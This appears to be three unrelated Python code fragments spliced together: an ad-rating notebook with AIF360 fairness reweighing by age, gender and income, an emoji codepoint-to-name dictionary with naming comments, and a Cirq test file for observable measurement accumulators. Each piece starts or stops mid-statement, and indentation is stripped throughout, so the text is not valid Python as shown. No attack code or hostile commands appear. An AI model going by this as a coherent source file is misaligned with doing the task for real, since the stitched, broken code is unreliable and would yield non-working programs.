MOSTWATCHEDTVPROGRAMMES_8: "**",
MOSTWATCHEDTVPROGRAMMES_9: "**",
MOSTWATCHEDTVPROGRAMMES_10: "**",
MOSTWATCHEDTVPROGRAMMES_11: "**",
RATING: "**",
AD_NUM_FACES: "**",
FAV: "**",
UNFAV: "**"
}
AD_FACE_COLS = [AD_NUM_FACES]
AD_LABEL_COLS = [AD_LABEL_FEATURE_1,AD_LABEL_FEATURE_2,AD_LABEL_FEATURE_3,AD_LABEL_FEATURE_4,AD_LABEL_FEATURE_5,
AD_LABEL_FEATURE_6,AD_LABEL_FEATURE_7,AD_LABEL_FEATURE_8,AD_LABEL_FEATURE_9,AD_LABEL_FEATURE_10,
AD_LABEL_FEATURE_11,AD_LABEL_FEATURE_12,AD_LABEL_FEATURE_13,AD_LABEL_FEATURE_14,AD_LABEL_FEATURE_15,
AD_LABEL_FEATURE_16,AD_LABEL_FEATURE_17,AD_LABEL_FEATURE_18,AD_LABEL_FEATURE_19,AD_LABEL_FEATURE_20,
AD_LABEL_FEATURE_21,AD_LABEL_FEATURE_22,AD_LABEL_FEATURE_23,AD_LABEL_FEATURE_24,AD_LABEL_FEATURE_25]
AD_OBJECT_COLS = [AD_OBJECT_FEATURE_1,AD_OBJECT_FEATURE_2,AD_OBJECT_FEATURE_3,AD_OBJECT_FEATURE_4,AD_OBJECT_FEATURE_5,
AD_OBJECT_FEATURE_6,AD_OBJECT_FEATURE_7,AD_OBJECT_FEATURE_8,AD_OBJECT_FEATURE_9,AD_OBJECT_FEATURE_10,
AD_OBJECT_FEATURE_11,AD_OBJECT_FEATURE_12,AD_OBJECT_FEATURE_13,AD_OBJECT_FEATURE_14,AD_OBJECT_FEATURE_15,
AD_OBJECT_FEATURE_16,AD_OBJECT_FEATURE_17,AD_OBJECT_FEATURE_18,AD_OBJECT_FEATURE_19,AD_OBJECT_FEATURE_20,
AD_OBJECT_FEATURE_21,AD_OBJECT_FEATURE_22,AD_OBJECT_FEATURE_23,AD_OBJECT_FEATURE_24]
AD_SAFE_SEARCH_COLS = [AD_SAFESEARCH_FEATURE_1,AD_SAFESEARCH_FEATURE_2,AD_SAFESEARCH_FEATURE_3,AD_SAFESEARCH_FEATURE_4,
AD_SAFESEARCH_FEATURE_5,AD_SAFESEARCH_FEATURE_6,AD_SAFESEARCH_FEATURE_7,AD_SAFESEARCH_FEATURE_8,
AD_SAFESEARCH_FEATURE_9,AD_SAFESEARCH_FEATURE_10,AD_SAFESEARCH_FEATURE_11,AD_SAFESEARCH_FEATURE_12,AD_SAFESEARCH_FEATURE_13]
SELECTED_AD_COLS = AD_FACE_COLS + AD_LABEL_COLS + AD_OBJECT_COLS + AD_SAFE_SEARCH_COLS
SELECTED_HOMECOUNTRY_COLS = [HOMECOUNTRY_CANADA, HOMECOUNTRY_CZECHREPUBLIC, HOMECOUNTRY_GREATBRITAIN,
HOMECOUNTRY_INDIA, HOMECOUNTRY_ITALY, HOMECOUNTRY_PHILLIPINES, HOMECOUNTRY_ROMANIA,
HOMECOUNTRY_SAUDIARABIA, HOMECOUNTRY_SINGAPORE, HOMECOUNTRY_SLOVENIA,
HOMECOUNTRY_UNITEDKINGDOM, HOMECOUNTRY_UNITEDSTATESOFAMERICA]
SELECTED_INCOME_COLS = [INCOME_0, INCOME_1, INCOME_2, INCOME_3]
SELECTED_MOSTLISTENEDMUSICS_COLS = [MOSTLISTENEDMUSICS_1, MOSTLISTENEDMUSICS_2, MOSTLISTENEDMUSICS_3,
MOSTLISTENEDMUSICS_4, MOSTLISTENEDMUSICS_5, MOSTLISTENEDMUSICS_6,
MOSTLISTENEDMUSICS_7, MOSTLISTENEDMUSICS_8, MOSTLISTENEDMUSICS_9,
MOSTLISTENEDMUSICS_10, MOSTLISTENEDMUSICS_11, MOSTLISTENEDMUSICS_12,
MOSTLISTENEDMUSICS_13, MOSTLISTENEDMUSICS_14, MOSTLISTENEDMUSICS_15,
MOSTLISTENEDMUSICS_16, MOSTLISTENEDMUSICS_17, MOSTLISTENEDMUSICS_18,
MOSTLISTENEDMUSICS_19, MOSTLISTENEDMUSICS_20, MOSTLISTENEDMUSICS_21,
MOSTLISTENEDMUSICS_22]
SELECTED_MOSTREADBOOKS_COLS = [MOSTREADBOOKS_1, MOSTREADBOOKS_2, MOSTREADBOOKS_3, MOSTREADBOOKS_4,
MOSTREADBOOKS_5, MOSTREADBOOKS_6, MOSTREADBOOKS_7, MOSTREADBOOKS_8,
MOSTREADBOOKS_9, MOSTREADBOOKS_10, MOSTREADBOOKS_11, MOSTREADBOOKS_12,
MOSTREADBOOKS_13, MOSTREADBOOKS_14, MOSTREADBOOKS_15, MOSTREADBOOKS_16,
MOSTREADBOOKS_17, MOSTREADBOOKS_18, MOSTREADBOOKS_19, MOSTREADBOOKS_20,
MOSTREADBOOKS_21, MOSTREADBOOKS_22, MOSTREADBOOKS_23, MOSTREADBOOKS_24,
MOSTREADBOOKS_25, MOSTREADBOOKS_26, MOSTREADBOOKS_27, MOSTREADBOOKS_28,
MOSTREADBOOKS_29, MOSTREADBOOKS_30, MOSTREADBOOKS_31]
SELECTED_MOSTWATCHEDMOVIES_COLS = [MOSTWATCHEDMOVIES_1, MOSTWATCHEDMOVIES_2, MOSTWATCHEDMOVIES_3,
MOSTWATCHEDMOVIES_4, MOSTWATCHEDMOVIES_5, MOSTWATCHEDMOVIES_6,
MOSTWATCHEDMOVIES_7, MOSTWATCHEDMOVIES_8, MOSTWATCHEDMOVIES_9,
MOSTWATCHEDMOVIES_10, MOSTWATCHEDMOVIES_11, MOSTWATCHEDMOVIES_12,
MOSTWATCHEDMOVIES_13, MOSTWATCHEDMOVIES_14, MOSTWATCHEDMOVIES_15,
MOSTWATCHEDMOVIES_16, MOSTWATCHEDMOVIES_17, MOSTWATCHEDMOVIES_18,
MOSTWATCHEDMOVIES_19, MOSTWATCHEDMOVIES_20, MOSTWATCHEDMOVIES_21]
SELECTED_MOSTWATCHEDTVPROGRAMMES_COLS = [MOSTWATCHEDTVPROGRAMMES_1, MOSTWATCHEDTVPROGRAMMES_2,
MOSTWATCHEDTVPROGRAMMES_3, MOSTWATCHEDTVPROGRAMMES_4,
MOSTWATCHEDTVPROGRAMMES_5, MOSTWATCHEDTVPROGRAMMES_6,
MOSTWATCHEDTVPROGRAMMES_7, MOSTWATCHEDTVPROGRAMMES_8,
MOSTWATCHEDTVPROGRAMMES_9, MOSTWATCHEDTVPROGRAMMES_10,
MOSTWATCHEDTVPROGRAMMES_11]
SELECTED_INP_COLS = [AGE, ZIP_CODE, FAVE_SPORTS, GENDER_F, GENDER_M] + SELECTED_AD_COLS + SELECTED_HOMECOUNTRY_COLS + SELECTED_INCOME_COLS + SELECTED_MOSTLISTENEDMUSICS_COLS + SELECTED_MOSTREADBOOKS_COLS + SELECTED_MOSTWATCHEDMOVIES_COLS + SELECTED_MOSTWATCHEDTVPROGRAMMES_COLS
EMBED_COLS = [FAV, UNFAV]
SELECTED_COLS = SELECTED_INP_COLS + [TARGET_COL]
print(SELECTED_COLS)
def reweigh_biased_cols(bias_cols,df):
y = df[[RATING]]
X = df[bias_cols]
# Assumption: for each column (except AGE), value 1 = privileged, value 0 = unprivileged
priv_cols = []
for col in bias_cols:
if col == AGE:
X[AGE] = pd.to_numeric(df[AGE])
bucket_boundaries = [0, 20, 40, 100] # refer pandas.cut() for syntax on binning
X["Age_bucket"] = pd.cut(X[AGE], bins=bucket_boundaries, labels=["young", "middle-age", "old"])
X['privilaged_age_bucket'] = 0.0
# considering middle-age and old as the privileged group
X.loc[X['Age_bucket'] != "young", 'privilaged_age_bucket'] = 1.0
priv_cols.append('privilaged_age_bucket')
elif col == GENDER_F:
X[col] = pd.to_numeric(df[col])
priv_cols.append(col)
elif col == INCOME_3:
X[col] = pd.to_numeric(df[col])
X[col] = X[col].replace({0:1, 1:0})  # Considering income groups 0, 1 and 2 as privileged
priv_cols.append(col)
elif col == "countries":
X["countries"] = pd.to_numeric(df[col])
X[col] = X[col].replace({0:1, 1:0})  # flip the indicator so that an original value of 0 is treated as privileged
priv_cols.append(col)
else:
raise NotImplementedError(f"Don't know how to reweigh {col}")
y[RATING] = pd.to_numeric(y[RATING])
y.loc[y[RATING] != 1.0, RATING] = 2.0
y[RATING] = y[RATING] - 1.0
X = X[priv_cols]
train_pp_bld = BinaryLabelDataset(df=pd.concat((X, y),axis=1),
label_names=[RATING],
protected_attribute_names=priv_cols,
favorable_label=1.0,
unfavorable_label=0.0)
privileged_dict = {}
unprivileged_dict = {}
for col in priv_cols:
privileged_dict[col] = 1
unprivileged_dict[col] = 0
privileged_groups = [privileged_dict]
unprivileged_groups = [unprivileged_dict]
rw = Reweighing(unprivileged_groups=unprivileged_groups, privileged_groups=privileged_groups)
train_pp_bld_f = rw.fit_transform(train_pp_bld)
#df["fairness_privilage_weight"] = train_pp_bld_f.instance_weights
#df["fairness_privilage_weight"] = df["fairness_privilage_weight"].astype(str)
return train_pp_bld_f.instance_weights
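# Illustrative usage sketch (assumption: ``df`` is the ads dataframe loaded with
# ad_dataset_pd(SELECTED_COLS) further below); returns one AIF360 instance
# weight per row, which can then be passed to the model as sample weights:
#   sample_weights = reweigh_biased_cols([AGE, GENDER_F, INCOME_3], df)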
def ad_dataset_pd(usecols:List[str]=None, **read_csv_kwargs):
"""
Read the given set of columns from the CSV file into a Pandas DataFrame.
"""
return pd.read_csv(users_ads_rating_csv, usecols=usecols, dtype=str, **read_csv_kwargs)
ad_dataset_pd(SELECTED_COLS).sample(5).T
chakin.search(lang='English')
WORD_VEC_DIMENSIONS = 50
get_ipython().run_cell_magic('time', '', '\nembedding_index = EmbeddingFactory(Path("./embeddings/"), "GloVe.6B.50d", WORD_VEC_DIMENSIONS, nrows=None, skiprows=None)')
def transform_embed_col(s:pd.Series, t:Tokenizer, maxlen:int=None):
"""Tokenizes each row in s using t and pads them to equal length of maxlen. Computes maxlen if not provided"""
# integer encode the text data
encoded_col = t.texts_to_sequences(s)
# calculate max len of vector and make length equal by padding with zeros
if maxlen is None:
maxlen = max(len(x) for x in encoded_col)
'1f42a': {'canonical_name': 'arabian_camel', 'aliases': []},
'1f42b': {'canonical_name': 'camel', 'aliases': []},
'1f418': {'canonical_name': 'elephant', 'aliases': []},
'1f98f': {'canonical_name': 'rhinoceros', 'aliases': []},
'1f98d': {'canonical_name': 'gorilla', 'aliases': []},
'1f40e': {'canonical_name': 'horse', 'aliases': []},
'1f416': {'canonical_name': 'pig', 'aliases': ['oink']},
'1f410': {'canonical_name': 'goat', 'aliases': []},
'1f40f': {'canonical_name': 'ram', 'aliases': []},
'1f411': {'canonical_name': 'sheep', 'aliases': ['baa']},
'1f415': {'canonical_name': 'dog', 'aliases': ['woof']},
'1f429': {'canonical_name': 'poodle', 'aliases': []},
'1f408': {'canonical_name': 'cat', 'aliases': ['meow']},
# alarm seemed like a fun addition
'1f413': {'canonical_name': 'rooster', 'aliases': ['alarm', 'cock-a-doodle-doo']},
'1f983': {'canonical_name': 'turkey', 'aliases': []},
'1f54a': {'canonical_name': 'dove', 'aliases': ['dove_of_peace']},
'1f407': {'canonical_name': 'rabbit', 'aliases': []},
'1f401': {'canonical_name': 'mouse', 'aliases': []},
'1f400': {'canonical_name': 'rat', 'aliases': []},
'1f43f': {'canonical_name': 'chipmunk', 'aliases': []},
# paws seemed like reasonable addition. Put feet at People/135
'1f43e': {'canonical_name': 'paw_prints', 'aliases': ['paws']},
'1f409': {'canonical_name': 'dragon', 'aliases': []},
'1f432': {'canonical_name': 'dragon_face', 'aliases': []},
'1f335': {'canonical_name': 'cactus', 'aliases': []},
'1f384': {'canonical_name': 'holiday_tree', 'aliases': []},
'1f332': {'canonical_name': 'evergreen_tree', 'aliases': []},
'1f333': {'canonical_name': 'tree', 'aliases': ['deciduous_tree']},
'1f334': {'canonical_name': 'palm_tree', 'aliases': []},
# sprout seemed like a reasonable addition
'1f331': {'canonical_name': 'seedling', 'aliases': ['sprout']},
# seemed like the best emoji for plant
'1f33f': {'canonical_name': 'herb', 'aliases': ['plant']},
# clover seemed like a reasonable addition
'2618': {'canonical_name': 'shamrock', 'aliases': ['clover']},
# lucky seems more useful
'1f340': {'canonical_name': 'lucky', 'aliases': ['four_leaf_clover']},
'1f38d': {'canonical_name': 'bamboo', 'aliases': []},
# https://emojipedia.org/tanabata-tree/
'1f38b': {'canonical_name': 'wish_tree', 'aliases': ['tanabata_tree']},
# seemed like good additions. Used fall instead of autumn, since don't have
# the rest of the seasons, and could imagine someone using both meanings of
# fall.
'1f343': {'canonical_name': 'leaves', 'aliases': ['wind', 'fall']},
'1f342': {'canonical_name': 'fallen_leaf', 'aliases': []},
'1f341': {'canonical_name': 'maple_leaf', 'aliases': []},
'1f344': {'canonical_name': 'mushroom', 'aliases': []},
# harvest seems more useful
'1f33e': {'canonical_name': 'harvest', 'aliases': ['ear_of_rice']},
'1f490': {'canonical_name': 'bouquet', 'aliases': []},
# seems like the best emoji for flower
'1f337': {'canonical_name': 'tulip', 'aliases': ['flower']},
'1f339': {'canonical_name': 'rose', 'aliases': []},
# crushed suggest by a user
'1f940': {'canonical_name': 'wilted_flower', 'aliases': ['crushed']},
'1f33b': {'canonical_name': 'sunflower', 'aliases': []},
'1f33c': {'canonical_name': 'blossom', 'aliases': []},
'1f338': {'canonical_name': 'cherry_blossom', 'aliases': []},
'1f33a': {'canonical_name': 'hibiscus', 'aliases': []},
'1f30e': {'canonical_name': 'earth_americas', 'aliases': []},
'1f30d': {'canonical_name': 'earth_africa', 'aliases': []},
'1f30f': {'canonical_name': 'earth_asia', 'aliases': []},
'1f315': {'canonical_name': 'full_moon', 'aliases': []},
# too many useless moons. Don't seem to get much use on twitter, and clog
# up typeahead for moon.
# '1f316': {'canonical_name': 'X', 'aliases': ['waning_crescent_moon']},
# '1f317': {'canonical_name': 'X', 'aliases': ['last_quarter_moon']},
# '1f318': {'canonical_name': 'X', 'aliases': ['waning_crescent_moon']},
'1f311': {'canonical_name': 'new_moon', 'aliases': []},
# '1f312': {'canonical_name': 'X', 'aliases': ['waxing_crescent_moon']},
# '1f313': {'canonical_name': 'X', 'aliases': ['first_quarter_moon']},
'1f314': {'canonical_name': 'waxing_moon', 'aliases': []},
'1f31a': {'canonical_name': 'new_moon_face', 'aliases': []},
'1f31d': {'canonical_name': 'moon_face', 'aliases': []},
'1f31e': {'canonical_name': 'sun_face', 'aliases': []},
# goodnight seems way more useful
'1f31b': {'canonical_name': 'goodnight', 'aliases': []},
# '1f31c': {'canonical_name': 'X', 'aliases': ['last_quarter_moon_with_face']},
# seems like the best emoji for moon
'1f319': {'canonical_name': 'moon', 'aliases': []},
# dizzy taken by People/54, had to come up with something else
'1f4ab': {'canonical_name': 'seeing_stars', 'aliases': []},
'2b50': {'canonical_name': 'star', 'aliases': []},
# glowing_star from gemoji/unicode
'1f31f': {'canonical_name': 'glowing_star', 'aliases': []},
# glamour seems like a reasonable addition
'2728': {'canonical_name': 'sparkles', 'aliases': ['glamour']},
# high_voltage from gemoji/unicode
'26a1': {'canonical_name': 'high_voltage', 'aliases': ['zap']},
# https://emojipedia.org/fire/
'1f525': {'canonical_name': 'fire', 'aliases': ['lit', 'hot', 'flame']},
# explosion and crash seem like reasonable additions
'1f4a5': {'canonical_name': 'boom', 'aliases': ['explosion', 'crash', 'collision']},
# meteor seems like a reasonable addition
'2604': {'canonical_name': 'comet', 'aliases': ['meteor']},
'2600': {'canonical_name': 'sunny', 'aliases': []},
'1f324': {'canonical_name': 'mostly_sunny', 'aliases': []},
# partly_cloudy for the glass half empty people
'26c5': {'canonical_name': 'partly_sunny', 'aliases': ['partly_cloudy']},
'1f325': {'canonical_name': 'cloudy', 'aliases': []},
# sunshowers seems like a more fun term
'1f326': {'canonical_name': 'sunshowers', 'aliases': ['sun_and_rain', 'partly_sunny_with_rain']},
# pride and lgbtq seem like reasonable additions
'1f308': {'canonical_name': 'rainbow', 'aliases': ['pride', 'lgbtq']},
# overcast seems like a good addition
'2601': {'canonical_name': 'cloud', 'aliases': ['overcast']},
# suggested by a user typing these into their typeahead.
'1f327': {'canonical_name': 'rainy', 'aliases': ['soaked', 'drenched']},
# thunderstorm seems better for this emoji, and thunder_and_rain more
# evocative than thunder_cloud_and_rain
'26c8': {'canonical_name': 'thunderstorm', 'aliases': ['thunder_and_rain']},
# lightning_storm seemed better than lightning_cloud
'1f329': {'canonical_name': 'lightning', 'aliases': ['lightning_storm']},
# snowy to parallel sunny, cloudy, etc; snowstorm seems like a good
# addition
'1f328': {'canonical_name': 'snowy', 'aliases': ['snowstorm']},
'2603': {'canonical_name': 'snowman', 'aliases': []},
# don't need two snowmen. frosty is nice because it's a weather emoji
# (primary benefit) and also a snowman (one that suffered from not having
# snow, in fact)
'26c4': {'canonical_name': 'frosty', 'aliases': []},
'2744': {'canonical_name': 'snowflake', 'aliases': []},
# the internet didn't seem to have a good use for this emoji. windy is a
# good weather term that is otherwise not represented. mother_nature from
# https://emojipedia.org/wind-blowing-face/
'1f32c': {'canonical_name': 'windy', 'aliases': ['mother_nature']},
'1f4a8': {'canonical_name': 'dash', 'aliases': []},
# tornado_cloud comes from the unicode, but e.g. gemoji drops the cloud
'1f32a': {'canonical_name': 'tornado', 'aliases': []},
# hazy seemed like a good addition
'1f32b': {'canonical_name': 'fog', 'aliases': ['hazy']},
'1f30a': {'canonical_name': 'ocean', 'aliases': []},
# drop seems better than droplet, since it could be used for its other
# meanings. water drop partly so that it shows up in typeahead for water
'1f4a7': {'canonical_name': 'drop', 'aliases': ['water_drop']},
'1f4a6': {'canonical_name': 'sweat_drops', 'aliases': []},
'2614': {'canonical_name': 'umbrella_with_rain', 'aliases': []},
'1f34f': {'canonical_name': 'green_apple', 'aliases': []},
'1f34e': {'canonical_name': 'apple', 'aliases': []},
'1f350': {'canonical_name': 'pear', 'aliases': []},
# An argument for not calling this orange is to save the color for a color
# swatch, but we can deal with that when it happens. Mandarin is from
# https://emojipedia.org/tangerine/, also like that it has a second meaning
'1f34a': {'canonical_name': 'orange', 'aliases': ['tangerine', 'mandarin']},
'1f34b': {'canonical_name': 'lemon', 'aliases': []},
'1f34c': {'canonical_name': 'banana', 'aliases': []},
'1f349': {'canonical_name': 'watermelon', 'aliases': []},
'1f347': {'canonical_name': 'grapes', 'aliases': []},
'1f353': {'canonical_name': 'strawberry', 'aliases': []},
'1f348': {'canonical_name': 'melon', 'aliases': []},
'1f352': {'canonical_name': 'cherries', 'aliases': []},
'1f351': {'canonical_name': 'peach', 'aliases': []},
'1f34d': {'canonical_name': 'pineapple', 'aliases': []},
'1f95d': {'canonical_name': 'kiwi', 'aliases': []},
'1f951': {'canonical_name': 'avocado', 'aliases': []},
'1f345': {'canonical_name': 'tomato', 'aliases': []},
'1f346': {'canonical_name': 'eggplant', 'aliases': []},
'1f952': {'canonical_name': 'cucumber', 'aliases': []},
'1f955': {'canonical_name': 'carrot', 'aliases': []},
# maize is from unicode
'1f33d': {'canonical_name': 'corn', 'aliases': ['maize']},
# chili_pepper seems like a reasonable addition
'1f336': {'canonical_name': 'hot_pepper', 'aliases': ['chili_pepper']},
'1f954': {'canonical_name': 'potato', 'aliases': []},
# yam seems better than sweet_potato, since we already have a potato (not a
# strong argument, but is better on the typeahead not to have emoji that
# share long prefixes)
'1f360': {'canonical_name': 'yam', 'aliases': ['sweet_potato']},
'1f330': {'canonical_name': 'chestnut', 'aliases': []},
'1f95c': {'canonical_name': 'peanuts', 'aliases': []},
'1f36f': {'canonical_name': 'honey', 'aliases': []},
'1f950': {'canonical_name': 'croissant', 'aliases': []},
'1f35e': {'canonical_name': 'bread', 'aliases': []},
'1f956': {'canonical_name': 'baguette', 'aliases': []},
'1f9c0': {'canonical_name': 'cheese', 'aliases': []},
'1f95a': {'canonical_name': 'egg', 'aliases': []},
# already have an egg in Foods/31, though I guess it wouldn't be a big deal to
# add it here.
'1f373': {'canonical_name': 'cooking', 'aliases': []},
'1f953': {'canonical_name': 'bacon', 'aliases': []},
# there's no lunch and dinner, which is a small negative against adding
# breakfast
'1f95e': {'canonical_name': 'pancakes', 'aliases': ['breakfast']},
# There is already shrimp in Nature/51, and tempura seems like a better
# description
'1f364': {'canonical_name': 'tempura', 'aliases': []},
# drumstick seems like a better description
'1f357': {'canonical_name': 'drumstick', 'aliases': ['poultry']},
'1f356': {'canonical_name': 'meat', 'aliases': []},
'1f355': {'canonical_name': 'pizza', 'aliases': []},
'1f32d': {'canonical_name': 'hotdog', 'aliases': []},
'1f354': {'canonical_name': 'hamburger', 'aliases': []},
'1f35f': {'canonical_name': 'fries', 'aliases': []},
# https://emojipedia.org/stuffed-flatbread/
'1f959': {'canonical_name': 'doner_kebab', 'aliases': ['shawarma', 'souvlaki', 'stuffed_flatbread']},
'1f32e': {'canonical_name': 'taco', 'aliases': []},
'1f32f': {'canonical_name': 'burrito', 'aliases': []},
'1f957': {'canonical_name': 'salad', 'aliases': []},
# I think Foods/49 is a better :food:
'1f958': {'canonical_name': 'paella', 'aliases': []},
'1f35d': {'canonical_name': 'spaghetti', 'aliases': []},
# seems like the best noodles? maybe this should be Foods/47? Noodles seem
# like a bigger thing in east asia than in europe, so going with that.
'1f35c': {'canonical_name': 'ramen', 'aliases': ['noodles']},
# seems like the best :food:. Also a reasonable :soup:, though the google
# one is indeed more a pot of food (the unicode) than a
# Copyright 2020 The Cirq Developers
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import dataclasses
import datetime
import time
import numpy as np
import pytest
import cirq
import cirq.work as cw
from cirq.work.observable_measurement_data import (
_check_and_get_real_coef,
_obs_vals_from_measurements,
_stats_from_measurements,
)
from cirq.work.observable_settings import _MeasurementSpec
def test_get_real_coef():
q0 = cirq.LineQubit(0)
assert _check_and_get_real_coef(cirq.Z(q0) * 2, atol=1e-8) == 2
assert _check_and_get_real_coef(cirq.Z(q0) * complex(2.0), atol=1e-8) == 2
with pytest.raises(ValueError):
_check_and_get_real_coef(cirq.Z(q0) * 2.0j, atol=1e-8)
def test_obs_vals_from_measurements():
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
vals = _obs_vals_from_measurements(bitstrings, qubit_to_index, obs, atol=1e-8)
should_be = [10, -10, -10, 10]
np.testing.assert_equal(vals, should_be)
def test_stats_from_measurements():
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
mean, err = _stats_from_measurements(bitstrings, qubit_to_index, obs, atol=1e-8)
# The mean is zero since our bitstrings have balanced even- and odd-
# parity cases.
assert mean == 0
# Since we multiplied our observable by 10, each observed value is +-10,
# i.e. it deviates from the mean by 10. The variance is therefore 10**2,
# and the squared standard error of the mean is found by dividing it by
# the number of samples minus 1.
assert err == 10**2 / (4 - 1)
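# Worked numbers (illustrative sketch, not part of the original test): the
# observed values are [+10, -10, -10, +10], so the ddof=1 sample variance is
# sum((x - 0)**2) / (4 - 1) = 400 / 3, and the squared standard error of the
# mean is (400 / 3) / 4 = 10**2 / (4 - 1) ~= 33.3, matching the assertion
# above.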
def test_observable_measured_result():
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
omr = cw.ObservableMeasuredResult(
setting=cw.InitObsSetting(
init_state=cirq.Z(a) * cirq.Z(b), observable=cirq.Y(a) * cirq.Y(b)
),
mean=0,
variance=5**2,
repetitions=4,
circuit_params={'phi': 52},
)
assert omr.stddev == 5
assert omr.observable == cirq.Y(a) * cirq.Y(b)
assert omr.init_state == cirq.Z(a) * cirq.Z(b)
cirq.testing.assert_equivalent_repr(omr)
assert omr.as_dict() == {
'init_state': cirq.Z(a) * cirq.Z(b),
'observable': cirq.Y(a) * cirq.Y(b),
'mean': 0,
'variance': 25,
'repetitions': 4,
'param.phi': 52,
}
omr2 = dataclasses.replace(
omr,
circuit_params={
'phi': 52,
'observable': 3.14, # this would be a bad but legal parameter name
'param.phi': -1,
},
)
assert omr2.as_dict() == {
'init_state': cirq.Z(a) * cirq.Z(b),
'observable': cirq.Y(a) * cirq.Y(b),
'mean': 0,
'variance': 25,
'repetitions': 4,
'param.phi': 52,
'param.observable': 3.14,
'param.param.phi': -1,
}
@pytest.fixture()
def example_bsa() -> 'cw.BitstringAccumulator':
"""Test fixture to create an (empty) example BitstringAccumulator"""
q0, q1 = cirq.LineQubit.range(2)
setting = cw.InitObsSetting(
init_state=cirq.KET_ZERO(q0) * cirq.KET_ZERO(q1), observable=cirq.X(q0) * cirq.Y(q1)
)
meas_spec = _MeasurementSpec(
max_setting=setting, circuit_params={'beta': 0.123, 'gamma': 0.456}
)
bsa = cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[
setting,
cw.InitObsSetting(init_state=setting.init_state, observable=cirq.X(q0)),
cw.InitObsSetting(init_state=setting.init_state, observable=cirq.Y(q1)),
],
qubit_to_index={q0: 0, q1: 1},
)
return bsa
def test_bitstring_accumulator(example_bsa):
# test initialization
assert example_bsa.bitstrings.shape == (0, 2)
assert example_bsa.chunksizes.shape == (0,)
assert example_bsa.timestamps.shape == (0,)
# test consume_results
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
example_bsa.consume_results(bitstrings)
assert example_bsa.bitstrings.shape == (4, 2)
assert example_bsa.chunksizes.shape == (1,)
assert example_bsa.timestamps.shape == (1,)
assert example_bsa.n_repetitions == 4
with pytest.raises(ValueError):
example_bsa.consume_results(bitstrings.astype(int))
# test results
results = list(example_bsa.results)
assert len(results) == 3
for r in results:
assert r.repetitions == 4
# test records
for r in example_bsa.records:
assert isinstance(r, dict)
assert 'repetitions' in r
assert r['repetitions'] == 4
def test_bitstring_accumulator_strings(example_bsa):
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
example_bsa.consume_results(bitstrings)
q0, q1 = cirq.LineQubit.range(2)
settings = cw.observables_to_settings(
[cirq.X(q0), cirq.Y(q1), cirq.X(q0) * cirq.Y(q1)], qubits=[q0, q1]
)
strings_should_be = [
'+Z(q(0)) * +Z(q(1)) → X(q(0)): 0.000 +- 0.577',
'+Z(q(0)) * +Z(q(1)) → Y(q(1)): 0.000 +- 0.577',
'+Z(q(0)) * +Z(q(1)) → X(q(0))*Y(q(1)): 0.000 +- 0.577',
]
for setting, ssb in zip(settings, strings_should_be):
assert example_bsa.summary_string(setting) == ssb, ssb
assert (
str(example_bsa)
== """Accumulator +Z(q(0)) * +Z(q(1)) → X(q(0))*Y(q(1)); 4 repetitions
+Z(q(0)) * +Z(q(1)) → X(q(0))*Y(q(1)): 0.000 +- 0.577
+Z(q(0)) * +Z(q(1)) → X(q(0)): 0.000 +- 0.577
+Z(q(0)) * +Z(q(1)) → Y(q(1)): 0.000 +- 0.577"""
)
def test_bitstring_accumulator_equality():
et = cirq.testing.EqualsTester()
bitstrings = np.array([[0, 0], [0, 1], [1, 0], [1, 1]], dtype=np.uint8)
chunksizes = np.asarray([4])
timestamps = np.asarray([datetime.datetime.now()])
a = cirq.NamedQubit('a')
b = cirq.NamedQubit('b')
qubit_to_index = {a: 0, b: 1}
obs = cirq.Z(a) * cirq.Z(b) * 10
setting = cw.InitObsSetting(init_state=cirq.Z(a) * cirq.Z(b), observable=obs)
meas_spec = _MeasurementSpec(setting, {})
cirq.testing.assert_equivalent_repr(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
)
)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
),
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings.copy(),
chunksizes=chunksizes.copy(),
timestamps=timestamps.copy(),
),
)
time.sleep(1)
timestamps = np.asarray([datetime.datetime.now()])
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=_MeasurementSpec(setting, {'a': 2}),
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
bitstrings = bitstrings.copy()
bitstrings[0] = [1, 1]
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
chunksizes = np.asarray([2, 2])
timestamps = np.asarray(list(timestamps) * 2)
et.add_equality_group(
cw.BitstringAccumulator(
meas_spec=meas_spec,
simul_settings=[setting],
qubit_to_index=qubit_to_index,
bitstrings=bitstrings,
chunksizes=chunksizes,
timestamps=timestamps,
)
)
def _get_ZZ_Z_Z_bsa_constructor_args():
